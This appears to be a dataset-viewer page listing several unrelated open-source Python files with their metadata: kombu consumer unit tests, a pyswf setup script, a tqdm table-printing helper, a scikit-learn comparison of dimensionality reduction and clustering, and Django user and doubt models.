        """recover() forwards to basic_recover."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        consumer.recover()
        assert 'basic_recover' in channel
    def test_revive(self):
        """revive() rebinds the consumer and its queues to a new channel."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        consumer = Consumer(channel, [b1])
        channel2 = self.connection.channel()
        consumer.revive(channel2)
        assert consumer.channel is channel2
        assert consumer.queues[0].channel is channel2
        assert consumer.queues[0].exchange.channel is channel2
    def test_revive__with_prefetch_count(self):
        """prefetch_count= triggers basic_qos at construction time."""
        channel = Mock(name='channel')
        b1 = Queue('qname1', self.exchange, 'rkey')
        Consumer(channel, [b1], prefetch_count=14)
        channel.basic_qos.assert_called_with(0, 14, False)
    def test__repr__(self):
        """repr() of a consumer never raises."""
        channel = self.connection.channel()
        b1 = Queue('qname1', self.exchange, 'rkey')
        assert repr(Consumer(channel, [b1]))
    def test_connection_property_handles_AttributeError(self):
        """.connection yields None when the channel has no client."""
        p = self.connection.Consumer()
        p.channel = object()
        assert p.connection is None
| celery/kombu | t/unit/test_messaging.py | test_messaging.py | py | 24,481 | python | en | code | 2,643 | github-code | 6 | [
{
"api_name": "kombu.Exchange",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "kombu.Connection",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "t.mocks.Transport",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "kombu.Producer",
... |
70285709629 | from __future__ import absolute_import
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
    """Return the text of *fname*, resolved relative to this file.

    Uses a context manager so the file handle is closed promptly rather
    than being left to the garbage collector, and reads as UTF-8 so the
    README decodes the same way on every platform.
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    with open(path, encoding='utf-8') as f:
        return f.read()
# Distribution metadata for the pyswf package; long_description is read
# from README.md at build time via the read() helper above.
setup(
    name='pyswf',
    version='1.5.4',
    description='SWF Parsing Utilities',
    long_description=read('README.md'),
    keywords = "swf parser parsing decompile utilities",
    author='Tim Knip',
    author_email='tim@floorplanner.com',
    url='https://github.com/timknip/pyswf',
    install_requires = ["lxml>=3.3.0", "Pillow>=2.3.0", "pylzma>=0.4.6", "six"],
    packages=find_packages(),
    license = "MIT",
    classifiers=[
        "Development Status :: 4 - Beta",
        "Topic :: Utilities",
        "License :: OSI Approved :: MIT License",
    ],
)
| timknip/pyswf | setup.py | setup.py | py | 982 | python | en | code | 154 | github-code | 6 | [
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "setuptools.setup",
"lin... |
33222746920 | from tqdm import tqdm
# Define constant
SHORT = 15
MIDDLE = 30
LARGE = 50
def __clear__(times: int = 11, length: int = 123):
    """
    Erase the previously printed table from the terminal.

    Emits ``times`` cursor-up-and-blank sequences (each "\\033[F" followed
    by ``length`` spaces), one final cursor-up, and a carriage return.
    Arg:    times   - How many table lines to blank out
            length  - The width (in spaces) used to overwrite each line
    """
    print()
    blank_line = "\033[F" + ' ' * length
    print(blank_line * times, end='')
    print("\033[F", end='')
    print("\r")
def __getCutLine__(length: int = 50, width_cell: int = 10, equal_symbol: bool = True) -> str:
    """
    Build a horizontal separator line for the table.

    The first segment is ``width_cell`` marks wide; each following segment
    is ``width_cell + 2`` wide, and segments are joined by '+'.  Segments
    are appended until the accumulated width reaches ``length - width_cell``.
    Arg: length       - The maximum length of the terminal
         width_cell   - The width of the table cell
         equal_symbol - Use '=' as the fill mark instead of '-'
    Ret: The custom cut line string
    """
    mark = '=' if equal_symbol else '-'
    pieces = ['+', mark * width_cell, '+']
    acc_length = width_cell
    while acc_length < length - width_cell:
        pieces.append(mark * (width_cell + 2))
        pieces.append('+')
        acc_length += width_cell + 2
    return ''.join(pieces)
class tqdm_table(tqdm):
    """A tqdm progress bar that can render a key/value table above itself."""
    def __init__(self, *args, **kwargs):
        """Initialize like tqdm; table state starts empty."""
        super().__init__(*args, **kwargs)
        # Maximum terminal width the table may occupy.
        self.max_length = 100
        # Number of lines printed by the previous table; -1 means "none yet".
        self.prev_lines = -1
    def set_table_setting(self, max_length: int = 100):
        """
        Assign the setting of this object
        Arg:    max_length  - The maximum length of the terminal
        """
        self.max_length = max_length
    def set_table_info(self, mapping: dict):
        """
        Set the table information
        Arg:    mapping     - The key-value pair you want to form the table
        """
        key_string = ""
        val_string = ""
        table_string = []
        key_list = sorted(mapping.keys())
        # Clear the previous table information toward stdout
        if self.prev_lines > 0:
            __clear__(self.prev_lines, self.max_length)
        # Determine the width of cell from the longest key or value.
        if max([max(len(str(val)), len(key)) for key, val in mapping.items()]) <= 15:
            width_length = SHORT
        elif max([max(len(str(val)), len(key)) for key, val in mapping.items()]) <= 30:
            width_length = MIDDLE
        else:
            width_length = LARGE
        # Collect the lines of keys and values, wrapping to a new row pair
        # whenever the current row would exceed the terminal width.
        for key in key_list:
            val = mapping[key]
            single_max_length = max(len(key), len(str(val)))
            if len(key_string) + single_max_length + 2 < self.max_length:
                if width_length == SHORT:
                    key_string += '{:>15} | '.format(key)
                    val_string += '{:>15} | '.format(val)
                elif width_length == MIDDLE:
                    key_string += '{:>30} | '.format(key)
                    val_string += '{:>30} | '.format(val)
                else:
                    key_string += '{:>50} | '.format(key)
                    val_string += '{:>50} | '.format(val)
            else:
                # Row full: flush the key/value pair of lines and restart.
                table_string.append(key_string)
                table_string.append(val_string)
                if width_length == SHORT:
                    key_string = '{:>15} | '.format(key)
                    val_string = '{:>15} | '.format(val)
                elif width_length == MIDDLE:
                    key_string = '{:>30} | '.format(key)
                    val_string = '{:>30} | '.format(val)
                else:
                    key_string = '{:>50} | '.format(key)
                    val_string = '{:>50} | '.format(val)
        # Accumulate the rest information if there are some information rest
        if len(key_string) > 0 or len(val_string) > 0:
            table_string.append(key_string)
            table_string.append(val_string)
        # Transfer the containing of queue into string: '=' lines frame each
        # row pair, '-' lines separate the key line from the value line.
        cut_string_small = __getCutLine__(length=max([len(_) for _ in table_string]), width_cell=width_length, equal_symbol=False)
        cut_string_large = __getCutLine__(length=max([len(_) for _ in table_string]), width_cell=width_length, equal_symbol=True)
        print_string = cut_string_large
        for i in range(len(table_string) // 2):
            print_string = print_string + '\n' + table_string[2*i] + '\n' + cut_string_small + '\n' + table_string[2*i+1] + '\n' + cut_string_large
        # Remember how many lines we printed so the next call can clear them.
        self.prev_lines = 2 * (len(table_string) + 1)
        # Write into tqdm
        self.write(print_string)
{
"api_name": "tqdm.tqdm",
"line_number": 48,
"usage_type": "name"
}
] |
"""Compare dimensionality-reduction and clustering methods on three datasets.

Figure 1: Sammon mapping vs PCA vs t-SNE, one row per dataset.
Figure 2: bisecting k-means vs classic k-means vs hierarchical clustering,
applied to the 2-D PCA projection of each dataset.
"""
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_wine
from E2 import sammon
from E1 import bkmeans
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import KMeans
from scipy.cluster.hierarchy import linkage
from scipy.cluster.hierarchy import dendrogram
# Sammon-mapping hyperparameters: iteration cap, error threshold, step size.
sammons_maxiter = 100
e = 0.001
A = 0.3
# Figure 1
fig1, axs1 = plt.subplots(3, 3, figsize=(10, 10))
print(f"Max iter set to {sammons_maxiter}. It might take a total of {sammons_maxiter*3} to run the code. Each iteration takes approx 0.5-2 seconds.")
for i in range(3):
    # Row i selects the dataset.
    if i == 0:
        datasetX, datasetLabels = load_breast_cancer().data, load_breast_cancer().target
        dataset_name = 'Breast Cancer Dataset'
    elif i == 1:
        datasetX, datasetLabels = load_wine().data, load_wine().target
        dataset_name = 'Wine Dataset'
    elif i == 2:
        # Diabetes data is loaded from a local CSV; last column is the label.
        diabetesData = np.genfromtxt('csv_result-diabetes.csv', delimiter=',', skip_header=1)
        datasetX, datasetLabels = diabetesData[:, :-1], diabetesData[:, -1]
        dataset_name = 'Diabetes Dataset'
    for j in range(3):
        # Column j selects the projection technique.
        if j == 0:
            print(f"Computing sammon mapping for {dataset_name} ({i+1}/3)")
            result = sammon(datasetX, sammons_maxiter, e, A)
            plot_title = 'Sammon Mapping'
        elif j == 1:
            pca = PCA(n_components=2)
            result = pca.fit_transform(datasetX)
            plot_title = 'PCA'
        elif j == 2:
            tsne = TSNE(n_components=2)
            result = tsne.fit_transform(datasetX)
            plot_title = 't-SNE'
        axs1[i, j].scatter(result[:, 0], result[:, 1], c=datasetLabels, s=5)
        axs1[i, j].set_title(f'{dataset_name} - {plot_title}')
plt.tight_layout()
# Figure 2: clustering comparison on the PCA-reduced data.
fig, axes = plt.subplots(3, 3, figsize=(10, 10))
for i in range(3):
    if i == 0:
        datasetX, datasetLabels = load_breast_cancer().data, load_breast_cancer().target
        dataset_name = 'Breast Cancer Dataset'
    elif i == 1:
        datasetX, datasetLabels = load_wine().data, load_wine().target
        dataset_name = 'Wine Dataset'
    elif i == 2:
        diabetesData = np.genfromtxt('csv_result-diabetes.csv', delimiter=',', skip_header=1)
        datasetX, datasetLabels = diabetesData[:, :-1], diabetesData[:, -1]
        dataset_name = 'Diabetes Dataset'
    # All clustering methods operate on the same 2-D PCA projection.
    pca = PCA(n_components=2)
    X_pca = pca.fit_transform(datasetX)
    for j in range(3):
        ax = axes[i, j]
        if j == 0:
            bkmeans_result = bkmeans(X_pca, 2, 30)
            c = bkmeans_result
            algorithm_name = 'bk means'
        elif j == 1:
            kmeans_result = KMeans(n_init = 10, n_clusters=2, random_state=0).fit_predict(X_pca)
            c = kmeans_result
            algorithm_name = 'classic k means'
        elif j == 2:
            # Hierarchical clustering draws its dendrogram into the axis;
            # the scatter below is colored by the true labels instead.
            hierarchical_result = linkage(X_pca, method='ward')
            dendro = dendrogram(hierarchical_result, ax=ax)
            c = datasetLabels
            algorithm_name = 'hierarchical'
        ax.scatter(X_pca[:, 0], X_pca[:, 1], c=c)
        ax.set_title(f'{dataset_name} - {algorithm_name}')
plt.tight_layout()
plt.show()
| Knoz9/ML-A3-A4 | km222ug_A4/E3.py | E3.py | py | 3,231 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "sklearn.datasets.load_breast_cancer",
"line_number": 22,
"usage_type": "call"
},
{
"... |
40851164655 | from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.db.models.signals import post_save
from django.conf import settings
class User(AbstractUser):
    """Site user; may be flagged as a teacher and/or a student."""
    is_teacher = models.BooleanField(default = False)
    is_student = models.BooleanField(default = False)

    def __str__(self):
        # Fixed: was misspelled ``__Str__``, so Django never actually
        # used it as the string representation.
        return self.username
#class Teacher(models.Model):
# user = models.OneToOneField(User, on_delete = models.CASCADE, primary_key = True)
#
#class Student(modesl.Model):
# user = models.OneToOneField(User, on_delete = models.CASCADE, primary_key = True)
class Doubt(models.Model):
    """A question raised by a student and directed at a teacher."""
    # The question text; an optional supporting image can be attached.
    questions = models.TextField(max_length = 200)
    picture = models.ImageField(blank = True, null = True, upload_to='images')
    # Both ends are User rows; related_name distinguishes the two roles.
    student = models.ForeignKey(User, related_name = 'student', on_delete = models.CASCADE)
    teacher = models.ForeignKey(User, related_name = 'teacher', on_delete = models.CASCADE)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
    """Create a DRF auth token automatically for every newly created user."""
    if created:
        Token.objects.create(user=instance)
{
"api_name": "django.contrib.auth.models.AbstractUser",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "django.db.models.BooleanField",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.db.models",
"line_number": 11,
"usage_type": "name"
},
{... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.